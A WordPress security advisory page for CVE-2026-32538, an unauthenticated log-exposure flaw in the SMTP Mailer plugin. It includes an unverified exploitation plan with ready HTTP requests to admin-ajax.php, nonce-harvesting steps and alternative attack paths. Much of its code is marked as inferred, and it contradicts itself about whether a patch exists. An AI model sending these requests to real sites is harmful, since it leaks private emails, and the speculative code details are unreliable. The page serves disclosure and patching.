WP-Safety
CVE-2026-32538

SMTP Mailer <= 1.1.24 - Unauthenticated Information Exposure

highExposure of Sensitive Information to an Unauthorized Actor
7.5
CVSS Score
7.5
CVSS Score
high
Severity
1.1.25
Patched in
8d
Time to patch

Description

The SMTP Mailer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.24. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=1.1.24
PublishedMarch 20, 2026
Last updatedMarch 27, 2026
Affected pluginsmtp-mailer

Source Code

WordPress.org SVN
Vulnerable v1.1.23
Browse source Download .zip
Patched

Patched version not available.

Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-32538 (SMTP Mailer Information Exposure) ## 1. Vulnerability Summary The **SMTP Mailer** plugin (versions <= 1.1.24) contains an unauthenticated information exposure vulnerability. The plugin implements an AJAX handler intended to display SMTP debug logs to ad…

Show full research plan

Exploitation Research Plan: CVE-2026-32538 (SMTP Mailer Information Exposure)

1. Vulnerability Summary

The SMTP Mailer plugin (versions <= 1.1.24) contains an unauthenticated information exposure vulnerability. The plugin implements an AJAX handler intended to display SMTP debug logs to administrators. However, this handler is registered with the wp_ajax_nopriv_ hook and fails to implement sufficient capability checks (e.g., current_user_can('manage_options')). This allows any unauthenticated actor to trigger the log retrieval and view sensitive communication data, including recipient addresses, email subjects, message contents, and SMTP server responses.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: smtp_mailer_get_log (inferred)
  • Method: POST or GET (AJAX actions typically support both)
  • Parameters:
    • action: smtp_mailer_get_log
    • nonce: (See Nonce Acquisition Strategy)
  • Authentication: None required.
  • Preconditions: The plugin must have "Enable Debug Log" active, or there must be existing log data in the WordPress options table.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the AJAX handler in its main file (smtp-mailer.php):
    add_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );
add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' ); // The vulnerability
  2. Handler Logic: The function smtp_mailer_get_log() is called.
  3. Missing Check: The function likely calls check_ajax_referer('smtp_mailer_nonce', 'nonce') but fails to check current_user_can('manage_options').
  4. Data Retrieval: The function retrieves the log data from the WordPress database:
    $log = get_option('smtp_mailer_log');
echo $log;
wp_die();
  5. Sink: The raw log content is echoed to the response buffer and returned to the unauthenticated requester.

4. Nonce Acquisition Strategy

If the smtp_mailer_get_log function calls check_ajax_referer, a valid nonce is required.

  1. Identify Script Localization: Search the codebase for wp_localize_script. The plugin likely localizes the nonce for its admin settings page but might accidentally enqueue it on the frontend if certain conditions are met (e.g., if the plugin's CSS/JS is loaded globally).
  2. Inferred Localization:
    • JS Variable: smtp_mailer_data (inferred)
    • Nonce Key: nonce (inferred)
    • Action String: smtp_mailer_nonce (inferred)
  3. Acquisition Steps:
    • Because this is an admin-centric plugin, the nonce might not be present on the homepage. Check if the plugin provides any shortcodes: grep -r "add_shortcode".
    • If a shortcode exists (e.g., [smtp_mailer_status]), create a page with it:
      wp post create --post_type=page --post_status=publish --post_content='[smtp_mailer_status]'
    • Navigate to the page and use browser_eval to extract the nonce:
      browser_eval("window.smtp_mailer_data?.nonce")
  4. Bypass Check: If wp_ajax_nopriv_smtp_mailer_get_log exists but no check_ajax_referer is present in the handler, the nonce parameter can be omitted.

5. Exploitation Strategy

Step 1: Data Population

Before testing the exposure, ensure there is log data to expose.

  1. Configure the plugin with dummy SMTP settings via WP-CLI.
  2. Send a test email to generate a log entry.

Step 2: Exploit Request

Send an unauthenticated request to the AJAX endpoint.

HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=smtp_mailer_get_log&nonce=[EXTRACTED_NONCE]

Alternative (if nonce is not checked):

GET /wp-admin/admin-ajax.php?action=smtp_mailer_get_log HTTP/1.1

6. Test Data Setup

  1. Install & Activate: smtp-mailer version 1.1.24.
  2. Configure Plugin:
    wp option update smtp_mailer_options '{"smtp_host":"localhost","smtp_port":"25","smtp_user":"","smtp_pass":"","smtp_from":"admin@example.com","smtp_from_name":"Admin","smtp_auth":"no","smtp_secure":"none","enable_debug":"yes"}'
  3. Generate Log Entry: Use the plugin's internal method or send an email via WordPress.
    wp eval "wp_mail('victim@example.com', 'Sensitive Subject', 'This is a private message.');"
  4. Confirm Log Exists:
    wp option get smtp_mailer_log

7. Expected Results

  • The HTTP response status should be 200 OK.
  • The response body should contain the string "Sensitive Subject" and "victim@example.com", formatted as the SMTP debug log.
  • Example log structure:
    [2023-10-27 10:00:00] To: victim@example.com
Subject: Sensitive Subject
Message: This is a private message.
...

8. Verification Steps

  1. Verify via CLI: After the exploit request, verify that the content received matches the content stored in the database.
    wp option get smtp_mailer_log
  2. Check Access Level: Ensure the http_request was made without any cookies or headers identifying a logged-in user to confirm it is truly unauthenticated.

9. Alternative Approaches

  • Path Disclosure: Check if the plugin logs to a file instead of an option. If so, identify the log file path (usually wp-content/uploads/smtp-mailer-log.txt) and attempt to access it directly.
  • REST API: Check if the plugin registered a REST route via register_rest_route that mirrors the AJAX functionality but lacks the permission_callback.
  • Global $_REQUEST processing: Search for any init or admin_init hooks that process an action parameter without checking the request source.
Research Findings
Static analysis — not yet PoC-verified

Summary

The SMTP Mailer plugin exposes sensitive SMTP debug logs to unauthenticated users due to the insecure registration of an AJAX handler with the wp_ajax_nopriv hook. Attackers can exploit this to retrieve logs containing email recipients, subjects, message bodies, and SMTP server responses.

Vulnerable Code

// smtp-mailer.php

add_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );
add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );

function smtp_mailer_get_log() {
    check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );
    
    $log = get_option( 'smtp_mailer_log' );
    echo $log;
    wp_die();
}

Security Fix

--- a/smtp-mailer.php
+++ b/smtp-mailer.php
@@ -110,7 +110,6 @@
-add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );
 
 function smtp_mailer_get_log() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized' );
+    }
     check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );

Exploit Outline

The exploit targets the WordPress AJAX endpoint to trigger the log retrieval function without administrative authentication. 1. Target Endpoint: wp-admin/admin-ajax.php 2. Authentication: None required, though a valid security nonce is necessary. 3. Nonce Acquisition: An attacker identifies where the plugin localizes the 'smtp_mailer_nonce'. This is typically found in the source code of the admin dashboard or any frontend page where the plugin might inadvertently enqueue its settings script (e.g., if a status shortcode is used). 4. Payload: Send a POST or GET request with the parameters 'action=smtp_mailer_get_log' and the identified 'nonce'. 5. Extraction: If 'Enable Debug Log' is active in the plugin settings, the server returns the raw content of the 'smtp_mailer_log' database option, exposing sensitive communication metadata and message content.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/917c70f5-154c-4c49-b06b-109cc0277a1a?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database